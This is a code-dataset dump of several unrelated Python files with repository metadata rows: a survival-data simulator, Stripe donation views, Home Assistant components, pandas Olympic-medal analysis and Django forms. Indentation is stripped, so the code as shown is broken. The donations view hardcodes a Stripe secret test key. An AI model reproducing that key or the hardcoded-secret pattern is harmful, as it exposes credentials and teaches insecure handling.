def simulate_JM_base(I, obstime, miss_rate=0.1, opt="none", seed=None):
if seed is not None:
np.random.seed(seed)
J = len(obstime)
#### longitudinal submodel ####
beta0 = np.array([1.5,2,0.5],)
beta1 = np.array([2,-1,1])
betat = np.array([1.5, -1, 0.6])
b_var = np.array([1,1.5,2])
e_var = np.array([1,1,1])
rho = np.array([-0.2,0.1,-0.3])
b_Sigma = np.diag(b_var)
b_Sigma[0,1] = b_Sigma[1,0] = np.sqrt(b_var[0]*b_var[1])*rho[0]
b_Sigma[0,2] = b_Sigma[2,0] = np.sqrt(b_var[0]*b_var[2])*rho[1]
b_Sigma[1,2] = b_Sigma[2,1] = np.sqrt(b_var[1]*b_var[2])*rho[2]
X = np.random.normal(3,1,size=I)
ranef = np.random.multivariate_normal(mean=[0,0,0], cov=b_Sigma, size=I)
mean_long = beta0 + np.outer(X,beta1)
eta_long = mean_long + ranef
if opt=="none" or opt=="nonph":
gamma = np.array([-4,-2])
alpha = np.array([0.2,-0.2,0.4])
x1 = np.random.binomial(n=1,p=0.5,size=I)
x2 = np.random.normal(size=I)
W = np.stack((x1,x2), axis=1)
eta_surv = W@gamma + eta_long@alpha
base = W[...,np.newaxis]
if opt=="interaction":
gamma = np.array([-4,-2,3])
alpha = np.array([0.2,-0.2,0.4])
x1 = np.random.binomial(n=1,p=0.5,size=I)
x2 = np.random.normal(size=I)
x3 = x1*x2
W = np.stack((x1,x2,x3), axis=1)
eta_surv = W@gamma + eta_long@alpha
base = np.stack((x1,x2), axis=1)
base = base[...,np.newaxis]
#Simulate Survival Times using Inverse Sampling Transform
scale = np.exp(-7)
U = np.random.uniform(size=I)
alpha_beta = alpha@betat
def CHF(tau):
def h(t):
if opt=="none" or opt=="interaction":
return scale * np.exp(eta_surv[i] + alpha_beta*t)
if opt=="nonph":
return scale * np.exp(eta_surv[i] + 3*x2[i]*np.sin(t) + alpha_beta*t)
return np.exp(-1 * integrate.quad(lambda xi: h(xi),0,tau)[0])
Ti = np.empty(I)
Ti[:] = np.NaN
for i in range(0,I):
Ti[i] = optimize.brentq(lambda xi: U[i]-CHF(xi), 0, 100)
#Get true survival probabilities
true_prob = np.ones((I, len(obstime)))
for i in range(0,I):
for j in range(1,len(obstime)):
tau = obstime[j]
true_prob[i,j] = CHF(tau)
C = np.random.uniform(low=obstime[3], high=obstime[-1]+25, size=I)
C = np.minimum(C, obstime[-1])
event = Ti<C
true_time = np.minimum(Ti, C)
# round true_time up to nearest obstime
time = [np.min([obs for obs in obstime if obs-t>=0]) for t in true_time]
subj_obstime = np.tile(obstime, reps=I)
pred_time = np.tile(obstime, reps=I)
mean_long = np.repeat(mean_long, repeats=J, axis=0)
eta_long = np.repeat(eta_long, repeats=J, axis=0)
long_err = np.random.multivariate_normal(mean=[0,0,0], cov=np.diag(e_var), size=I*J)
Y = np.empty((I*J,3))
Y_pred = np.empty((I*J,3))
for i in range(0,3):
Y[:,i] = eta_long[:,i] + betat[i]*subj_obstime + long_err[:,i]
Y_pred[:,i] = eta_long[:,i] + betat[i]*pred_time + long_err[:,i]
true_prob = true_prob.flatten()
ID = np.repeat(range(0,I), repeats=J)
visit = np.tile(range(0,J), reps=I)
data = pd.DataFrame({"id":ID, "visit":visit, "obstime":subj_obstime, "predtime":pred_time,
"time":np.repeat(time,repeats=J),
"event":np.repeat(event,repeats=J),
"Y1":Y[:,0],"Y2":Y[:,1],"Y3":Y[:,2],
"X1":np.repeat(base[:,0],repeats=J),
"X2":np.repeat(base[:,1],repeats=J),
"pred_Y1":Y_pred[:,0],"pred_Y2":Y_pred[:,1],
"pred_Y3":Y_pred[:,2],"true":true_prob})
return data
| 35.224138 | 95 | 0.530103 | 675 | 4,086 | 3.111111 | 0.201481 | 0.038095 | 0.007143 | 0.012857 | 0.305714 | 0.208095 | 0.168571 | 0.145714 | 0.130476 | 0.09619 | 0 | 0.049536 | 0.288546 | 4,086 | 115 | 96 | 35.530435 | 0.672859 | 0.035977 | 0 | 0.116279 | 0 | 0 | 0.028856 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034884 | false | 0 | 0.046512 | 0 | 0.127907 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad75f9c108a1269f3f0bb233116aae64ec6ea0c4 | 1,964 | py | Python | donations/views.py | Ascensiony/Software-Dev-Project | 85513737ae4a4b76fa0cfdab579b037d33b72faf | [
"MIT"
] | 2 | 2021-03-05T01:38:24.000Z | 2021-03-19T21:11:14.000Z | donations/views.py | yabhi0807/Software-Dev-Project | 85513737ae4a4b76fa0cfdab579b037d33b72faf | [
"MIT"
] | 7 | 2021-04-08T21:12:42.000Z | 2022-03-12T00:13:59.000Z | donations/views.py | venky012/ase-1-site | 877e36344c82567d3ebc7b0f29a2757da2a7f071 | [
"MIT"
] | 4 | 2020-02-17T09:47:39.000Z | 2020-02-22T12:11:18.000Z | from django.shortcuts import render, redirect
from django.urls import reverse
from django.http import JsonResponse
from .models import DonatorInfo
from django.conf import settings
import stripe
stripe.api_key = "sk_test_51GwRq2I7M5l47LQTANTu4qmSu5hi6FBlXfcKJiEvhbHjnAbyYgzMFBTGvGCDgYNpRVwx5qYG1e7aRjMaF4Qp0pWS00L3SVg6AB"
def donateus(request):
context = {
'donators': DonatorInfo.objects.all(),
'amount_raised': int(DonatorInfo.objects.last().total_amount if DonatorInfo.objects.last() else 5647)
}
return render(request, 'donations/donations.html', context)
def index(request):
return render(request, 'donations/index.html')
def charge(request):
amount = int(request.POST['amount'])
if request.method == 'POST':
donator_temp = DonatorInfo(donator_name=request.POST['nickname'],
amount=request.POST['amount'],
description=request.POST['desciption'],
total_amount=int(DonatorInfo.objects.last().total_amount if DonatorInfo.objects.last() else 5647) + amount)
donator_temp.save()
print('\nData:', request.POST)
print(f'Total Donated: {DonatorInfo.objects.last().total_amount}')
print(f'Donators: {DonatorInfo.objects.all()}')
customer = stripe.Customer.create(
email=request.POST['email'],
name=request.POST['nickname'],
source=request.POST['stripeToken']
)
charge = stripe.Charge.create(
customer=customer,
amount=int(amount * 7563),
currency="inr",
description=f"{request.POST['desciption']}\nAddress - {request.POST['address']}\nCountry - {request.POST['country']}"
)
return redirect(reverse('success', args=[amount]))
def successMsg(request, args):
amount = args
return render(request, 'donations/success.html', {'amount': amount})
| 33.288136 | 142 | 0.651731 | 197 | 1,964 | 6.441624 | 0.345178 | 0.095351 | 0.086682 | 0.06383 | 0.133176 | 0.107171 | 0.107171 | 0.107171 | 0.107171 | 0.107171 | 0 | 0.020381 | 0.22556 | 1,964 | 58 | 143 | 33.862069 | 0.813938 | 0 | 0 | 0 | 0 | 0.02439 | 0.239308 | 0.161405 | 0 | 0 | 0 | 0 | 0 | 1 | 0.097561 | false | 0 | 0.146341 | 0.02439 | 0.341463 | 0.073171 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad7c0a31d46092e4cb43d3f5d08f21d343b14c27 | 1,121 | py | Python | components/light_source.py | TheNicGard/DungeonStar | 525aeb53217166d2ce83e4e91a3b8c1b102f0dcb | [
"MIT"
] | 3 | 2019-07-11T17:54:42.000Z | 2021-03-09T10:58:13.000Z | components/light_source.py | BandW2011/DungeonStar | 525aeb53217166d2ce83e4e91a3b8c1b102f0dcb | [
"MIT"
] | 1 | 2019-07-11T17:55:38.000Z | 2020-05-03T06:34:56.000Z | components/light_source.py | TheNicGard/DungeonStar | 525aeb53217166d2ce83e4e91a3b8c1b102f0dcb | [
"MIT"
] | null | null | null | import tcod as libtcod
from game_messages import Message
class LightSource:
def __init__(self, light, max_duration, duration=0, permanent=False, enchantment=0):
self.light = light
self.max_duration = max_duration
self.duration = duration
self.permanent = permanent
self.enchantment = enchantment
self.lit = False
@property
def get_light(self):
if self.lit and (self.duration > 0 or self.permanent):
return self.light + self.enchantment
else:
return 0
def tick(self, message_log, in_inventory):
if self.lit and self.duration > 0 and not self.permanent:
self.duration -= 1
if self.duration <= 0:
if in_inventory and self.lit and self.owner and self.owner.owner:
message_log.add_message(Message("The {0} went out!".format(self.owner.owner.get_name), libtcod.yellow))
self.lit = False
@property
def get_char(self):
if self.get_light > 0:
return 254
else:
return 255
| 31.138889 | 123 | 0.599465 | 139 | 1,121 | 4.71223 | 0.323741 | 0.091603 | 0.045802 | 0.064122 | 0.155725 | 0.155725 | 0.076336 | 0 | 0 | 0 | 0 | 0.019711 | 0.321142 | 1,121 | 35 | 124 | 32.028571 | 0.840999 | 0 | 0 | 0.206897 | 0 | 0 | 0.015165 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.137931 | false | 0 | 0.068966 | 0 | 0.37931 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad7cd46950319b21616fc2d3ce6d25726bb14f34 | 4,096 | py | Python | code.py | AshishLohana/olympic-hero | 1612f43df1b03c4ecd53a9fcd2de6865fc813f62 | [
"MIT"
] | null | null | null | code.py | AshishLohana/olympic-hero | 1612f43df1b03c4ecd53a9fcd2de6865fc813f62 | [
"MIT"
] | null | null | null | code.py | AshishLohana/olympic-hero | 1612f43df1b03c4ecd53a9fcd2de6865fc813f62 | [
"MIT"
] | null | null | null | # --------------
#Importing header files
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
#Path of the file
data = pd.read_csv(path)
data.rename(columns={"Total":"Total_Medals"}, inplace = True)
print(data.head(10))
#Code starts here
# --------------
#Code starts here
data['Better_Event'] = np.where((data['Total_Summer'] > data['Total_Winter']),'Summer',(np.where(data['Total_Summer'] < data['Total_Winter'], 'Winter', 'Both')))
#data['Better_Event'] = np.where((data['Total_Summer'])>(data['Total_Winter']),'summer', np.where((data['Total_Summer'])<(data['Total_Winter']),'winter','both'))
#data['Better_Event'] = np.where(data['Total_Summer']<data['Total_Winter'],'Winter')
#data['Better_Event'] = np.where(data['Total_Summer']=data['Total_Winter'],'Both')
#print("w={} s={} ={}".format(data['Total_Winter'],data['Total_Summer'],
#print(data['Better_Event'])
better_ = data['Better_Event'].value_counts()
print(type(better_))
better_event = better_.argmax()
print(better_event)
# --------------
#Code starts here
top_countries = data[['Country_Name','Total_Summer','Total_Winter','Total_Medals']]
top_countries.drop(top_countries.index[len(top_countries)-1],inplace=True)
#def top_ten(top_countries,column_):
# country_list = []
# t = column_.nlargest(10)
# for i in column_:
# country_list.append(i.arg())
# return country_list
#print(country_list)
def top_ten(top_,column_):
country_list = []
t = top_.nlargest(10,column_)
print(t)
print("top ten countries: ")
print(list(t['Country_Name']))
country_list = list(t['Country_Name'])
return country_list
top_10_summer = top_ten(top_countries,'Total_Summer')
top_10_winter = top_ten(top_countries,'Total_Winter')
top_10 = top_ten(top_countries,'Total_Medals')
common = []
for i in top_10_summer:
if ((i in top_10_winter) & (i in top_10)):
common.append(i)
print(common)
# --------------
#Code starts here
summer_df = data[data['Country_Name'].isin(top_10_summer)]
winter_df = data[data['Country_Name'].isin(top_10_winter)]
top_df = data[data['Country_Name'].isin(top_10)]
print(" summer medalists: ",summer_df)
print(" winter medalists: ",winter_df)
print(" top medalists: ",top_df)
plt.bar(x = summer_df['Country_Name'],height=summer_df['Total_Summer'])
plt.bar(x = winter_df['Country_Name'],height=winter_df['Total_Winter'])
plt.bar(x = top_df['Country_Name'],height=top_df['Total_Medals'])
# --------------
#Code starts here
summer_df['Golden_Ratio'] = summer_df['Gold_Summer']/summer_df['Total_Summer']
summer_max_ratio = summer_df['Golden_Ratio'].max()
summer_country_gold = summer_df['Country_Name'][summer_df['Golden_Ratio'].argmax()]
winter_df['Golden_Ratio'] = winter_df['Gold_Winter']/summer_df['Total_Winter']
winter_max_ratio = winter_df['Golden_Ratio'].max()
winter_country_gold = winter_df['Country_Name'][winter_df['Golden_Ratio'].argmax()]
top_df['Golden_Ratio'] = top_df['Gold_Total']/summer_df['Total_Medals']
top_max_ratio = top_df['Golden_Ratio'].max()
top_country_gold = top_df['Country_Name'][top_df['Golden_Ratio'].argmax()]
# --------------
#Code starts here
data = pd.read_csv(path)
data_1 = data
data_1.drop((len(data_1)-1),axis=0,inplace=True)
print(data_1)
#data_1['Total_Points'] = [data_1['Gold_Total']*3] + [data_1['Silver_Total']*2] + data_1['Bronze_Total']
data_1['Gold_Total'] = 3 * (data_1['Gold_Total'])
data_1['Silver_Total'] = 2 * data_1['Silver_Total']
data_1['Total_Points'] = data_1['Gold_Total'] + data_1['Silver_Total'] + data_1['Bronze_Total']
most_points = data_1['Total_Points'].max()
best_country = data_1['Country_Name'][data_1['Total_Points'].argmax()]
# --------------
#Code starts here
best_ = data_1[data_1['Country_Name'] == best_country]
best = best_[['Gold_Total','Silver_Total','Bronze_Total']]
print(best)
best.plot.bar()
plt.xlabel('United States')
plt.ylabel('Medals Tally')
plt.xticks(rotation=45)
| 25.283951 | 162 | 0.675781 | 588 | 4,096 | 4.377551 | 0.159864 | 0.040793 | 0.045455 | 0.037296 | 0.283217 | 0.240093 | 0.21756 | 0.200466 | 0.12432 | 0.121989 | 0 | 0.015173 | 0.131104 | 4,096 | 161 | 163 | 25.440994 | 0.708064 | 0.234863 | 0 | 0.031746 | 0 | 0 | 0.270461 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.015873 | false | 0 | 0.047619 | 0 | 0.079365 | 0.190476 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad7e389141e1b8bd68ab703479154232d7e009cc | 2,731 | py | Python | challenges/forms.py | bitblueprint/RunningCause | 22114cec0a68ba8a2b7a3c143b71a587f273c7f1 | [
"MIT"
] | 3 | 2015-09-29T14:12:34.000Z | 2016-07-29T08:20:16.000Z | challenges/forms.py | bitblueprint/RunningCause | 22114cec0a68ba8a2b7a3c143b71a587f273c7f1 | [
"MIT"
] | 1 | 2016-07-29T10:38:47.000Z | 2016-08-01T08:32:48.000Z | challenges/forms.py | bitblueprint/RunningCause | 22114cec0a68ba8a2b7a3c143b71a587f273c7f1 | [
"MIT"
] | 3 | 2015-07-16T07:52:27.000Z | 2018-01-05T08:03:09.000Z | # coding: utf8
from datetime import date
from django import forms
from .models import Challenge
from django.utils.translation import ugettext as _
from django.contrib.auth import get_user_model
class ChallengeForm(forms.ModelForm):
runner = forms.ModelChoiceField(label=_("Runner"),
queryset=get_user_model().objects.all(),
required=False)
sponsor = forms.ModelChoiceField(label=_("Sponsor"),
queryset=get_user_model().objects.all(),
required=False)
amount = forms.FloatField(label=_("Amount (kr)"),
widget=forms.TextInput(
attrs={'class': 'form-control'}),
localize=True, required=True)
end_date = forms.DateField(label=_("End date"),
widget=forms.DateInput(
attrs={'class': 'form-control',
'id': 'challenge_datepicker',
'autocomplete': "off"}),
required=True)
challenge_text = forms.CharField(label=_("What is the challenge?"),
required=True,
widget=forms.Textarea(
attrs={'class': 'form-control'}))
class Meta:
model = Challenge
fields = ['runner', 'sponsor', 'amount', 'end_date', 'challenge_text']
def is_valid(self):
valid = super(ChallengeForm, self).is_valid()
if not valid:
return valid
if self.cleaned_data['amount'] < 0:
self.add_error('amount', _('Amount cannot be negative'))
valid = False
if self.cleaned_data['end_date'] < date.today():
self.add_error('end_date', _('End date cannot be in the past'))
valid = False
return valid
class ChallengeFeedbackForm(forms.Form):
feedback_msg = forms.CharField(
max_length=500, min_length=2,
label=_("Please write a message"),
widget=forms.Textarea(attrs={'class': 'form-control'})
)
class ChallengeChallengePreviewForm(forms.ModelForm):
class Meta:
model = Challenge
fields = ['amount', 'end_date', 'challenge_text']
def __init__(self, *args, **kwargs):
super(ChallengeChallengePreviewForm, self).__init__(*args, **kwargs)
instance = getattr(self, 'instance', None)
if instance and instance.pk:
for fname in self.fields:
self.fields[fname].widget.attrs['readonly'] = True
| 36.413333 | 78 | 0.534969 | 255 | 2,731 | 5.568627 | 0.384314 | 0.034507 | 0.039437 | 0.059155 | 0.202113 | 0.164789 | 0.123944 | 0.123944 | 0 | 0 | 0 | 0.003413 | 0.35628 | 2,731 | 74 | 79 | 36.905405 | 0.804323 | 0.004394 | 0 | 0.214286 | 0 | 0 | 0.128451 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035714 | false | 0 | 0.089286 | 0 | 0.357143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad87c69bd0feef648d2e5c35ecaf3a32de758035 | 2,489 | py | Python | homeassistant/components/insteon/binary_sensor.py | erogleva/core | 994ae09f69afe772150a698953c0d7386a745de2 | [
"Apache-2.0"
] | 6 | 2017-08-02T19:26:39.000Z | 2020-03-14T22:47:41.000Z | homeassistant/components/insteon/binary_sensor.py | erogleva/core | 994ae09f69afe772150a698953c0d7386a745de2 | [
"Apache-2.0"
] | 56 | 2020-08-03T07:30:54.000Z | 2022-03-31T06:02:04.000Z | homeassistant/components/insteon/binary_sensor.py | erogleva/core | 994ae09f69afe772150a698953c0d7386a745de2 | [
"Apache-2.0"
] | 14 | 2018-08-19T16:28:26.000Z | 2021-09-02T18:26:53.000Z | """Support for INSTEON dimmers via PowerLinc Modem."""
from pyinsteon.groups import (
CO_SENSOR,
DOOR_SENSOR,
HEARTBEAT,
LEAK_SENSOR_WET,
LIGHT_SENSOR,
LOW_BATTERY,
MOTION_SENSOR,
OPEN_CLOSE_SENSOR,
SENSOR_MALFUNCTION,
SMOKE_SENSOR,
TEST_SENSOR,
)
from homeassistant.components.binary_sensor import (
DEVICE_CLASS_BATTERY,
DEVICE_CLASS_DOOR,
DEVICE_CLASS_GAS,
DEVICE_CLASS_LIGHT,
DEVICE_CLASS_MOISTURE,
DEVICE_CLASS_MOTION,
DEVICE_CLASS_OPENING,
DEVICE_CLASS_PROBLEM,
DEVICE_CLASS_SAFETY,
DEVICE_CLASS_SMOKE,
DOMAIN as BINARY_SENSOR_DOMAIN,
BinarySensorEntity,
)
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from .const import SIGNAL_ADD_ENTITIES
from .insteon_entity import InsteonEntity
from .utils import async_add_insteon_entities
SENSOR_TYPES = {
OPEN_CLOSE_SENSOR: DEVICE_CLASS_OPENING,
MOTION_SENSOR: DEVICE_CLASS_MOTION,
DOOR_SENSOR: DEVICE_CLASS_DOOR,
LEAK_SENSOR_WET: DEVICE_CLASS_MOISTURE,
LIGHT_SENSOR: DEVICE_CLASS_LIGHT,
LOW_BATTERY: DEVICE_CLASS_BATTERY,
CO_SENSOR: DEVICE_CLASS_GAS,
SMOKE_SENSOR: DEVICE_CLASS_SMOKE,
TEST_SENSOR: DEVICE_CLASS_SAFETY,
SENSOR_MALFUNCTION: DEVICE_CLASS_PROBLEM,
HEARTBEAT: DEVICE_CLASS_PROBLEM,
}
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up the Insteon binary sensors from a config entry."""
def add_entities(discovery_info=None):
"""Add the Insteon entities for the platform."""
async_add_insteon_entities(
hass,
BINARY_SENSOR_DOMAIN,
InsteonBinarySensorEntity,
async_add_entities,
discovery_info,
)
signal = f"{SIGNAL_ADD_ENTITIES}_{BINARY_SENSOR_DOMAIN}"
async_dispatcher_connect(hass, signal, add_entities)
add_entities()
class InsteonBinarySensorEntity(InsteonEntity, BinarySensorEntity):
"""A Class for an Insteon binary sensor entity."""
def __init__(self, device, group):
"""Initialize the INSTEON binary sensor."""
super().__init__(device, group)
self._sensor_type = SENSOR_TYPES.get(self._insteon_device_group.name)
@property
def device_class(self):
"""Return the class of this sensor."""
return self._sensor_type
@property
def is_on(self):
"""Return the boolean response if the node is on."""
return bool(self._insteon_device_group.value)
| 28.94186 | 77 | 0.728003 | 298 | 2,489 | 5.667785 | 0.295302 | 0.14328 | 0.070456 | 0.027235 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.202491 | 2,489 | 85 | 78 | 29.282353 | 0.850882 | 0.102049 | 0 | 0.030303 | 0 | 0 | 0.020522 | 0.020522 | 0 | 0 | 0 | 0 | 0 | 1 | 0.060606 | false | 0 | 0.090909 | 0 | 0.19697 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad888c844745a00e448a736ad6859feb01cf87f3 | 1,626 | py | Python | dataset/calculate_dataset_mean.py | AmirMoghadamFalahi/frcnn-pod | d9ab2d78e28881ce2ae8ab69ae31d1f752e7aa28 | [
"MIT"
] | null | null | null | dataset/calculate_dataset_mean.py | AmirMoghadamFalahi/frcnn-pod | d9ab2d78e28881ce2ae8ab69ae31d1f752e7aa28 | [
"MIT"
] | null | null | null | dataset/calculate_dataset_mean.py | AmirMoghadamFalahi/frcnn-pod | d9ab2d78e28881ce2ae8ab69ae31d1f752e7aa28 | [
"MIT"
] | null | null | null | """
in this script, we calculate the image per channel mean and standard
deviation in the training set, do not calculate the statistics on the
whole dataset.
"""
import numpy as np
import cv2
import timeit
from os import listdir
from os.path import isdir
from tqdm import tqdm
# number of channels of the dataset image, 3 for color jpg, 1 for grayscale img
# you need to change it to reflect your dataset
CHANNEL_NUM = 3
def cal_dir_stat(root: str):
if not root.endswith('/'):
root += '/'
file_paths = [root + f for f in listdir(root) if not isdir(f)]
pixel_num = 0 # store all pixel number in the dataset
channel_sum = np.zeros(CHANNEL_NUM)
channel_sum_squared = np.zeros(CHANNEL_NUM)
for file_path in tqdm(file_paths):
im = cv2.imread(file_path) # image in M*N*CHANNEL_NUM shape, channel in BGR order
# im = im / 255.0
pixel_num += (im.size / CHANNEL_NUM)
channel_sum += np.sum(im, axis=(0, 1))
channel_sum_squared += np.sum(np.square(im), axis=(0, 1))
bgr_mean = channel_sum / pixel_num
bgr_std = np.sqrt(channel_sum_squared / pixel_num - np.square(bgr_mean))
# change the format from bgr to rgb
rgb_mean = list(bgr_mean)[::-1]
rgb_std = list(bgr_std)[::-1]
return rgb_mean, rgb_std
# The script assumes that under train_root, there are separate directories for each class
# of training images.
train_root = "training_images/"
start = timeit.default_timer()
mean, std = cal_dir_stat(train_root)
end = timeit.default_timer()
print("elapsed time: {}".format(end - start))
print("mean:{}\nstd:{}".format(mean, std))
| 30.111111 | 90 | 0.694342 | 264 | 1,626 | 4.121212 | 0.397727 | 0.055147 | 0.046875 | 0.03125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012336 | 0.202337 | 1,626 | 53 | 91 | 30.679245 | 0.826523 | 0.324108 | 0 | 0 | 0 | 0 | 0.045203 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | false | 0 | 0.2 | 0 | 0.266667 | 0.066667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad890a1d4d6c292c94c8daa1e937e277a1ae7700 | 335 | py | Python | homeassistant/components/zoneminder/const.py | ccatterina/core | 36789cfc310f270bf343676eb94d123e5d0dfa83 | [
"Apache-2.0"
] | 6 | 2016-11-25T06:36:27.000Z | 2021-11-16T11:20:23.000Z | homeassistant/components/zoneminder/const.py | ccatterina/core | 36789cfc310f270bf343676eb94d123e5d0dfa83 | [
"Apache-2.0"
] | 45 | 2020-10-15T06:47:06.000Z | 2022-03-31T06:26:16.000Z | homeassistant/components/zoneminder/const.py | ccatterina/core | 36789cfc310f270bf343676eb94d123e5d0dfa83 | [
"Apache-2.0"
] | 2 | 2020-11-17T09:19:47.000Z | 2020-12-16T03:56:09.000Z | """Constants for zoneminder component."""
CONF_PATH_ZMS = "path_zms"
DEFAULT_PATH = "/zm/"
DEFAULT_PATH_ZMS = "/zm/cgi-bin/nph-zms"
DEFAULT_SSL = False
DEFAULT_VERIFY_SSL = True
DOMAIN = "zoneminder"
SERVICE_SET_RUN_STATE = "set_run_state"
PLATFORM_CONFIGS = "platform_configs"
CONFIG_DATA = "config_data"
API_CLIENT = "api_client"
| 22.333333 | 41 | 0.770149 | 48 | 335 | 4.958333 | 0.5625 | 0.088235 | 0.092437 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.110448 | 335 | 14 | 42 | 23.928571 | 0.798658 | 0.104478 | 0 | 0 | 0 | 0 | 0.309524 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad899414e80df0b727216aac3b6ca1646af784c5 | 8,264 | py | Python | iotronic_ui/project/boards/views.py | MDSLab/iotronic-ops-dashboard | ef12ec244e9ef156322749593c8d17de726f5586 | [
"Apache-2.0"
] | null | null | null | iotronic_ui/project/boards/views.py | MDSLab/iotronic-ops-dashboard | ef12ec244e9ef156322749593c8d17de726f5586 | [
"Apache-2.0"
] | 1 | 2018-10-17T10:59:55.000Z | 2018-10-30T11:58:40.000Z | iotronic_ui/project/boards/views.py | MDSLab/iotronic-ops-dashboard | ef12ec244e9ef156322749593c8d17de726f5586 | [
"Apache-2.0"
] | null | null | null | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
from django.core.urlresolvers import reverse
from django.core.urlresolvers import reverse_lazy
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
# from horizon import messages
from horizon import tables
from horizon import tabs
from horizon.utils import memoized
from openstack_dashboard.api import iotronic
from openstack_dashboard import policy
from openstack_dashboard.dashboards.project.boards \
import forms as project_forms
from openstack_dashboard.dashboards.project.boards \
import tables as project_tables
from openstack_dashboard.dashboards.project.boards \
import tabs as project_tabs
LOG = logging.getLogger(__name__)
class IndexView(tables.DataTableView):
table_class = project_tables.BoardsTable
template_name = 'project/boards/index.html'
page_title = _("Boards")
def get_data(self):
boards = []
# Admin
if policy.check((("iot", "iot:list_all_boards"),), self.request):
try:
boards = iotronic.board_list(self.request, None, None)
except Exception:
exceptions.handle(self.request,
_('Unable to retrieve boards list.'))
# Admin_iot_project
elif policy.check((("iot", "iot:list_project_boards"),), self.request):
try:
boards = iotronic.board_list(self.request, None, None)
except Exception:
exceptions.handle(self.request,
_('Unable to retrieve user boards list.'))
# Other users
else:
try:
boards = iotronic.board_list(self.request, None, None)
except Exception:
exceptions.handle(self.request,
_('Unable to retrieve user boards list.'))
for board in boards:
board_services = iotronic.services_on_board(self.request, board.uuid, True)
# board.__dict__.update(dict(services=board_services))
board._info.update(dict(services=board_services))
return boards
class CreateView(forms.ModalFormView):
template_name = 'project/boards/create.html'
modal_header = _("Create Board")
form_id = "create_board_form"
form_class = project_forms.CreateBoardForm
submit_label = _("Create Board")
submit_url = reverse_lazy("horizon:project:boards:create")
success_url = reverse_lazy('horizon:project:boards:index')
page_title = _("Create Board")
class UpdateView(forms.ModalFormView):
template_name = 'project/boards/update.html'
modal_header = _("Update Board")
form_id = "update_board_form"
form_class = project_forms.UpdateBoardForm
submit_label = _("Update Board")
submit_url = "horizon:project:boards:update"
success_url = reverse_lazy('horizon:project:boards:index')
page_title = _("Update Board")
@memoized.memoized_method
def get_object(self):
try:
return iotronic.board_get(self.request, self.kwargs['board_id'],
None)
except Exception:
redirect = reverse("horizon:project:boards:index")
exceptions.handle(self.request,
_('Unable to get board information.'),
redirect=redirect)
def get_context_data(self, **kwargs):
context = super(UpdateView, self).get_context_data(**kwargs)
args = (self.get_object().uuid,)
context['submit_url'] = reverse(self.submit_url, args=args)
return context
def get_initial(self):
board = self.get_object()
location = board.location[0]
return {'uuid': board.uuid,
'name': board.name,
'mobile': board.mobile,
'owner': board.owner,
'latitude': location["latitude"],
'longitude': location["longitude"],
'altitude': location["altitude"]}
